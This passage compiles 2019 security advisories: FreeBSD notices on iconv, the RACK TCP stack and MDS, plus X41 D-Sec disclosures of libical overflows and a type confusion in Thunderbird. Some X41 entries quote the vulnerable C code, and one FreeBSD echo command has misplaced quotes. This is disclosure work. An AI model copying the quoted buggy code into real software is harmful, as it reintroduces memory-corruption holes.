which iconv is used, an attacker may be able to create a denial of service, provoke incorrect program behavior, or induce a remote code execution. iconv is a libc library function and the nature of possible attacks will depend on the way in which iconv is used by applications or daemons. IV. Workaround No workaround is available. Stack canaries (-fstack-protector), which are enabled by default, provide a degreee of defense against code injection but not against denial of service. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Restart any potentially affected daemons. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch # fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch.asc # gpg --verify iconv.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart all daemons that use the library, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349622 releng/12.0/ r349621 stable/11/r349624 releng/11.3/ r349621 releng/11.2/ r349621 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5600> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:09.iconv.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WBfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK8qg//bXSYMJQUBC0POTT5zGXSAmXfKjxbCi4N67cfTrQkEvW672QX4Jw9smkK D3PwyQs8QWIwsXL69rRgKDFHhPplOmTkx1vaPrA3DckYliwNvLRV3I6G2bRnx3E3 DoAyDmBvFK5lJWa3WxbCpeJA69yZ/JbX1Yw6HsRLk74hGkfvlkruKkfxsNjXzaq4 0+d+ZYs/vRDmIW5/R/bYy1+iyDamyCMl2xXtlZBKrGe6lhj8Vi4/evJjipFtskc2 RnGKolNoZQc03pgX0QS2JZDb+ay23elkOCbhYPqGr1f++M95oOktX3epsJNSH++u pmJ72FNRsnZSVFxoX7o14eh4k6OGYIvGFSkXQ9VG1NV7PQO8VZAQk9gw264O/1Mi 2aW88e78GLallQOg32VM+Ybys9MamBHByiYRz+GXhh91gg
FreeBSD Security Advisory FreeBSD-SA-19:08.rack
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:08.rack Security Advisory The FreeBSD Project Topic: Resource exhaustion in non-default RACK TCP stack Category: core Module: inet Announced: 2019-06-19 Credits:Jonathan Looney (Netflix) Peter Lei (Netflix) Affects:FreeBSD 12.0 and later Corrected: 2019-06-19 16:25:39 UTC (stable/12, 12.0-STABLE) 2019-06-19 16:43:05 UTC (releng/12.0, 12.0-RELEASE-p6) CVE Name: CVE-2019-5599 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background The Transmission Control Protocol (TCP) of the TCP/IP protocol suite provides a connection-oriented, reliable, sequence-preserving data stream service. A TCP loss detection algorithm called RACK ("Recent ACKnowledgment") uses the notion of time, in addition to packet or sequence counts, to detect losses for modern TCP implementations that support per-packet timestamps and the selective acknowledgment (SACK) option. FreeBSD ships an optional implementation of RACK. Please note this is not included by default. If RACK was not specifically compiled, installed, and loaded, the system is not vulnerable. II. Problem Description While processing acknowledgements, the RACK code uses several linked lists to maintain state entries. A malicious attacker can cause the lists to grow unbounded. This can cause an expensive list traversal on every packet being processed, leading to resource exhaustion and a denial of service. III. Impact An attacker with the ability to send specially crafted TCP traffic to a victim system can degrade network performance and/or consume excessive CPU by exploiting the inefficiency of traversing the potentially very large RACK linked lists with relatively small bandwidth cost. IV. Workaround By default RACK is not compiled or loaded into the TCP stack. To determine if you are using RACK, check the net.inet.tcp.functions_available sysctl. If it includes a line with "rack", the RACK stack is loaded. To disable RACK, unload the kernel module with: # kldunload tcp_rack Note: it may be required to use the force flag (-f) with the kldunload. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Since the tcp_rack kernel module is not built by default, recompile, reinstall, and reload the kernel module. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch # fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch.asc # gpg --verify rack.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile, reinstall, and reload the tcp_rack kernel module. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349197 releng/12.0/ r349199 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision=NN> VII. References https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5599> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:08.rack.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0KZy1fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbn
X41 D-Sec GmbH Security Advisory X41-2019-004: Type confusion in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-004 Type confusion in Thunderbird = Severity Rating: Medium Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11706 CWE: 843 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird Summary and Impact == A type confusion has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash the process or leak information from the client system via calendar replies. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A type confusion in icalproperty.c icaltimezone_get_vtimezone_properties() can be triggered while parsing a malformed calendar attachment. Missing sanity checks allows a TZID property to be parsed as ICALFLOATVALUE but it is later used as a string. The bug manifests with strdup(tzid); being called with tzid containing a bad pointer obtained by casting to char* from a float value, which typically means segfaulting by dereferencing a non-mapped memory page. An attacker might be able to deliver an input file containing specially crafted float values as TZID properties which could point to arbitrary memory positions. Certain conditions could allow to exfiltrate information via a calendar reply or other undetermined impact. Proof of Concept A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-004 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2019-05-30 Issues reported to the vendor 2019-06-07 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50 CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY 8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr 4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4 M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk= =Hy9J -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-003: Stack-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-003 Stack-based buffer overflow in Thunderbird == Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11705 CWE: 121 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird Summary and Impact == A stack-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. ~~~ static int icalrecuraddbydayrules(struct icalrecurparser *parser, const char *vals) { short *array = parser->rt.byday; // ... while (n != 0) { // ... if (wd != ICALNOWEEKDAY) { array[i++] = (short) (sign * (wd + 8 * weekno)); array[i] = ICALRECURRENCEARRAYMAX; } } ~~~ Missing sanity checks in `icalrecuradd_bydayrules()can lead to out of bounds write in aarraywhenweekno` takes an invalid value. The issue manifests as an out-of-bounds write in a stack allocated buffer overflow. It is expected that an attacker can exploit this vulnerability to achieve remote code execution when proper stack smashing mitigations are missing. Proof of Concept A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-003 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2019-05-23 Issues reported to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtJsACgkQo5Klpg50 CxALNg//RiEGsoszNtnBzS/tvL5UIniG6oBXHaqu+9XZUJeM+tYzs4Z3JvvHWx1y exGt3nM3PMXgw21lr8NumJGHibMDckIrOIpetphg9GqRfk/iS4NivcHcbhSq7sNz NajGpulM6HtgDflFgpB1GKfekE/DJlbiULq5SBgv/bARRARGGgGNtWp863sQPKG+ rvjSOnTyQw1ypYjozMYrmUasgC4jsLmB0LUIWqHy6lEN5OWehnO9pOpiV8xTA0qc Y9C0IDkf6YGH6xwOxaUXc9HXGBOiQATexNGOtOmWoUsg7cpRdnuoo8YOP9V+kbeX OK301LlXUtt0th5zu6tVGo4WK75sI8gmpxUtcbIyCxTzRC7fqAlbHGaKlQURZ23s /2Tv5pzpBBjIO4T2t8v1O/10pDyfH2zUCXik3il2GY+zpNprR1Va6asB4y3nEPl1 ghLYCjHt58CZJZILMmK/lZap6I3ea9UaW3TsZuC07zv8A9bf+I6xcgA0+4Ms6e0P 1d1T/ygVluKRay5fgiiubTYAqtngFTOXMCioj/JmeDvL+wTYpwduukhZxDuGT6P/ OV0MuvDW1RQpj2hsw+dbcVnE+Y7X/WZDVbq3ByOj5VQz/mTPkcGaJVh37kI9Sp6A YFJYuJrFqmdMFh365aUmAOp26hYdY9++wwWAqAlYAVFjLXst5is= =E1se -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-002: Heap-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-002 Heap-based buffer overflow in Thunderbird = Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11703 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird Summary and Impact == A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1281041 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A heap-based buffer overflow in icalparser.c parser_get_next_char() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. The issue initially manifests with out of bounds read, but we don't discard it could later lead to out of bounds write. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept A reproducer ical file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-002 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2016-06-20 Issue reported by Brandon Perry to the vendor 2019-05-23 Issues reported to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtHsACgkQo5Klpg50 CxD5DRAAnruhd0PEjQV3ELUiM/9PHe5hC8rpWLqPNcuDY/dbPvg4w1qOAoXops9e d3hJlMM2zaUeAv5MZGgxT7FIO116IFafALMjMssIC9zw3yM9oKF4s1amL/GzF+P9 vMamD3A5t5j2mHYuWFaDe+bcHak8QfmVgSRqKNvNp/rF27oWE3SgCraYFP1+RlpR s0qbFcjLdo9SBqvpbSt3cbolrIOiS2nXER1cthmd2Ig7ga3oElEfWKZ19d+twBxx oKqtS607p9ASfql29HDwC0VtgQPx1ySRBestYDtjsD2d97bAaAhA2/Kkpx6A/H91 EbiSyKByO3vs+nQzTdkI/xNN9edBly6se3WKaDBIfZOzWCsXwcUtUKpnAw5YMf/n BoaDzv/D70Sk3GfXOD9qb2bMNFCEQdeZh3O1Tmmzi3kXa9kQJfdIDdjfeeDd7h87 r6vtYeHA7mVM2BGteO5FHQhooJVSi+gcGg9esj5656YznRS9zbc7KgkWJiItwMhj hiBL7r8v2M0Gzx4qhhCg+gxl+ikBaYCgZh9WGi4fsekwufwEnnCnQxN52ZE9vBia BJJGpPbGkVaxDCJXOfQDvJiovbG4ekK54tavqLBXaH/KuucMFGaE95gPSKnxn8LD 0QwpeLzad2bSiolSHux5RBR/t5d4znzjce/qxIpRQdWcgu9kzTs= =1OOu -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-001 Heap-based buffer overflow in Thunderbird = Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11704 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird Summary and Impact == A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1280832 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. ~~~ static char *icalmemorystrdupanddequote(const char *str) { char *out = (char *)malloc(sizeof(char) * strlen(str) + 1); char *pout = out; // ... for (p = str; *p!=0; p++){ if( *p == '\') { p++; // ... else { *pout = *p; } } ~~~ Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the inputp` ends with a backslash, which enables an attacker to read out of bounds of the input buffer and writing out of bounds of a heap-allocated output buffer. The issue manifests in several ways, including out of bounds read and write, null-pointer dereference and frequently leads to heap corruption. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept A reproducer EML file can be found in: https://github.com/x41sec/advisories/tree/master/X41-2019-001 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2016-06-19 Issue reported by Brandon Perry to the vendor 2019-05-23 Issue reported by X41 D-SEC to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtFQACgkQo5Klpg50 CxDziQ/+JVKmkCHu3UXeNTrf3nFAcg3pzopaADVMK4yo7P/iQW/HMtvlz3sbi/ND 8nkTzXjPwTXmPZqrcr8X28lsffx2wu4ehIZNp2izTkfQkbIeA0co1bM2KhGJU+p+ GQP8yGsVi00+UvQfd5KxB4ydc7/Q4nTFH325yx7D4OHW/rDuETt5p8h1h7zmFBW+ SV09t4qQQx8HeWj2pQS6wF6pWo80/nqJbS8f540PQ+XTysvYsflxiybAqYK2mW2j QzvjT/YosR39JCMHBKscptwVgJFT6b2DsSq+Lt+1BTn0Ef0XoIY/rMvLFX1ww8HK nsViFPjtyhkX7CftIjZK6y4oK4nKsgyDiOieNKodfkr1jTmipUIIjwtGM99pKcv2 wNDY4ySB7RSbW+W+yrWc75vEX+Ev1enXkeM6xcJiPO0CiWfceZpVzZVcjoFqt9H6 57Uy10OMzZDi3reIMsMs3SxpRyXQqcyjlPkk7PlkzHx2XjAMKqwW6t5QZwMpIHrm M4BQOzxz9UuhnfZI80ZmJhYCh9zOOdjmJXGxOp5cB1GSXjQQ7PH/0aqTbfI0Hp+b uxqXsxBJ0YTO0qhHluuPkInqLEKlewHvNT4P5YE7US3TNCHPuei7P3zTq7fqSPjW sgj9XXjf4cbB7N+txXnq55BpHemGKAd4spgvQvo0L35m2RribBs= =sYWR -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-001 Heap-based buffer overflow in Thunderbird = Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11704 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird Summary and Impact == A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1280832 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. ~~~ static char *icalmemorystrdupanddequote(const char *str) { char *out = (char *)malloc(sizeof(char) * strlen(str) + 1); char *pout = out; // ... for (p = str; *p!=0; p++){ if( *p == '\') { p++; // ... else { *pout = *p; } } ~~~ Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the inputp` ends with a backslash, which enables an attacker to read out of bounds of the input buffer and writing out of bounds of a heap-allocated output buffer. The issue manifests in several ways, including out of bounds read and write, null-pointer dereference and frequently leads to heap corruption. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept A reproducer EML file can be found in: https://github.com/x41sec/advisories/tree/master/X41-2019-001 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2016-06-19 Issue reported by Brandon Perry to the vendor 2019-05-23 Issue reported by X41 D-SEC to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CsOUACgkQo5Klpg50 CxA8/A/+KajTIDyZwSInPe0uftrEG/c+DNJLQfpH53sBH4qI9G8F+FPquEibdCEm WIXlbdxxo7iVGkBUxws3+aqOXYtBYRGUQvSMDxcM9bmLWkzIOWCZ7RW4h4KOngWu NiWqFkdpRLxSjHgEFn3eegvcnwEmpOlV4eBw5oY1rTFCg44hbrLXTKEZqOOVFII/ n754abauYhol2SezeuJL2Du1hf7n0e4T6DPdYsrwB4+3XwAdp6n86hy9DdXniqdk XvJ2WFTKPljkt2suHmkM28zx8q52O5kMIK0Szc5MVZRiFIrPNh/oYFkCoBVYTqFQ /ui0YJZOy8O6mA1l7j7A3I+t3DSUu4Cs0fCVCqrBVKm1LNcmnWIyDrGRCpY5WOTI S8lllwEeUv5UoSaoPAWIXhvo1J4ISUX0qoNWNqtRENJCXjZvsmOvZkwWy0bMdu5g 1iWZ3Ro/hx7eAbakWKPrzRdnLI7wz7bBcnm3BSY4gelAhtTMLds/OSplDUpYL1cI KRMsnosf2CBiRGlGqdpXVlXcsmi3dozRY7q87Kxh58x50efGTqYQ+yAmR1pMrQgH O0yWaspEQOnqoPiw9dvT3gTqopk0qNdPWwbr599NAVOP5d0H3AKyeJxzTzVUIsxg Jynb/E4hQxgyYN8tSqH/2SXqmXiOPJrJgLt0O4KmKVjMwvnS/OU= =3l5l -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-19:07.mds [REVISED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:07.mdsSecurity Advisory The FreeBSD Project Topic: Microarchitectural Data Sampling (MDS) Category: core Module: kernel Announced: 2019-05-14 Credits:Refer to Intel's security advisory at the URL below for detailed acknowledgements. Affects:All supported versions of FreeBSD. Corrected: 2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2019-05-14 Initial release. v1.1 2019-05-15 Fixed date on microcode update package. v1.2 2019-05-15 Userland startup microcode update details added. Add language specifying which manufacturers is affected. I. Background Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used. II. Problem Description On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. Only Intel x86 based processors are affected. x86 processors from other manufacturers (eg, AMD) are not believed to be vulnerable. Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo 'machdep.hyperthreading_allowed=0 >> /boot/loader.conf' # shutdown -r +10min "Security update" V. Solution Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system. New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14. If using the package or port the Intel microcode update can be applied at boot time (only on FreeBSD 12 and later) by adding the following lines to the system's /boot/loader.conf: cpu_microcode_load="YES" cpu_microcode_name="/boot/firmware/intel-ucode.bin" To automatically load microcode during userland startup (supported on all FreeBSD versions), add the following to /etc/rc.conf: microcode_update_enable="YES" 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Follow additional details under "Mitigation Configuration" below. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0-STABLE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc # gpg --verify mds.12-stable.patch.asc [FreeBSD 12.0-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc # gpg --verify mds.12.0.patch.asc [FreeBSD 11.3-PRERELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch # fetch 